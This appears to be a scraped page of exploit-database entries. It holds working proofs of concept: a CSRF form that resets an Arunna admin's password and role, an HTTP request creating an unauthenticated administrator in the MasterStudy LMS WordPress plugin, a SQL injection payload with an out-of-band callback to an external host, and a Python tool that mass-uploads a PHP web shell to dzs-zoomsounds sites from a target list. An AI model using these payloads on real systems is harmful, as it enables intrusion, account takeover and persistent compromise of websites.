resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br /><br /><br />Credits & Authors:<br />==================<br />h4shur<br />Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur<br />h4shursec@gmail.com<br /></code></pre>
<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)<br /># Date: November 29, 2021<br /># Exploit Author: =(L_L)=<br /># Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/<br /># Vendor Homepage: https://github.com/arunna<br /># Software Link: https://github.com/arunna/arunna<br /># Version: 1.0.0<br /># Tested on: Ubuntu 20.04.2 LTS<br /><br /><!--<br />The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). <br />--><br /><br /><html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr><br /><tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr><br /><tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr><br /><tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr><br /><tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr><br /><tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr><br /><tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr><br /><tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr><br /><tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr><br /><tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr><br /><tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr><br /><tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr><br /><tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr><br /><tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr><br /><tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr><br /><tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr><br /><tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr><br /><tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr><br /><tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr><br /><tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr><br /><tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr><br /></table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html><br /><br /></code></pre>
<pre><code># Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation<br /># Date: 16.02.2022<br /># Author: Numan Türle<br /># CVE: CVE-2022-0441<br /># Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/<br /># Version: <2.7.6<br /># https://www.youtube.com/watch?v=SI_O6CHXMZk<br /># https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6<br /># https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed<br /><br /><br />POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1<br />Connection: close<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br />Content-Type: application/json<br />Content-Length: 339<br /><br />{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}<br /> <br /><br /></code></pre>
<pre><code>## Title: Child's Day Care Management System 1.0 SQL - Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` in Login.php app, parameter from Child's Day Care<br />Management System 1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. Also, this system is vulnerable to<br />SQL-Injection-Bypass-Authentication<br />and XSS-Stored attacks. The attacker can be receiving all information<br />from the system by using these vulnerabilities! Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: inurl:wp-content/plugins/dzs-zoomsounds<br /># Date: 16/02/2022<br /># Exploit Author: Overthinker1877 (1877 Team)<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Version: 6.60<br /># Tested on: Windows / Linux<br /><br />import os<br />import requests<br />import threading<br />from multiprocessing.dummy import Pool,Lock<br />from bs4 import BeautifulSoup<br />import time<br />import smtplib,sys,ctypes<br />from random import choice<br />from colorama import Fore<br />from colorama import Style<br />from colorama import init<br />import re<br />import time<br />from time import sleep<br />init(autoreset=True)<br />fr = Fore.RED<br />gr = Fore.BLUE<br />fc = Fore.CYAN<br />fw = Fore.WHITE<br />fy = Fore.YELLOW<br />fg = Fore.GREEN<br />sd = Style.DIM<br />sn = Style.NORMAL<br />sb = Style.BRIGHT<br />Bad = 0<br />Good = 0<br />def Folder(directory):<br /> if not os.path.exists(directory):<br /> os.makedirs(directory)<br />Folder("exploited")<br />def clear():<br /> try:<br /> if os.name == 'nt':<br /> os.system('cls')<br /> else:<br /> os.system('clear')<br /> except:<br /> pass<br />def finder(i) :<br /> global Bad,Good<br /> head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}<br /> try :<br /> x = requests.session()<br /> listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']<br /> for script in listaa :<br /> url = (i+"/"+script)<br /> while True :<br /> req_first = x.get(url, headers=head)<br /> if "error:http raw post data does not exist" in req_first.text :<br /> burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}<br /> burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"<br /> requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)<br /> urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")<br /> req_second = x.get(urlx, headers=head)<br /> if "Overthinker1877" in req_second.text :<br /> Good = Good + 1<br /> print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)<br /> with open("exploited/shell.txt","a") as file :<br /> file.write(urlx+"\n")<br /> file.close()<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")<br /><br /> pass<br /> break<br /> except :<br /> pass<br /> if os.name == 'nt':<br /> ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))<br /> else :<br /> sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))<br /><br />def key_logo():<br /> clear = '\x1b[0m'<br /> colors = [36, 32, 34, 35, 31, 37]<br /> x = ' [ + ] OVERTHINKER1877 EXPLOIT'<br /> for N, line in enumerate(x.split('\n')):<br /> sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))<br /> time.sleep(0.05)<br /><br />def process(line):<br /> time.sleep(1)<br /><br /><br />def run() :<br /> key_logo()<br /> clear()<br /> print(""" <br /> [-] -----------------------------------------[-]<br /> [+] WwW.1877.TeaM<br /> [-] -----------------------------------------[-]<br /> \n \n""")<br /> file_name = input("Website List : ")<br /> op = open(file_name,'r').read().splitlines()<br /> TEXTList = [list.strip() for list in op]<br /> p = Pool(int(input('Thread : ')))<br /> p.map(finder, TEXTList)<br /><br />run()<br /> <br /><br /></code></pre>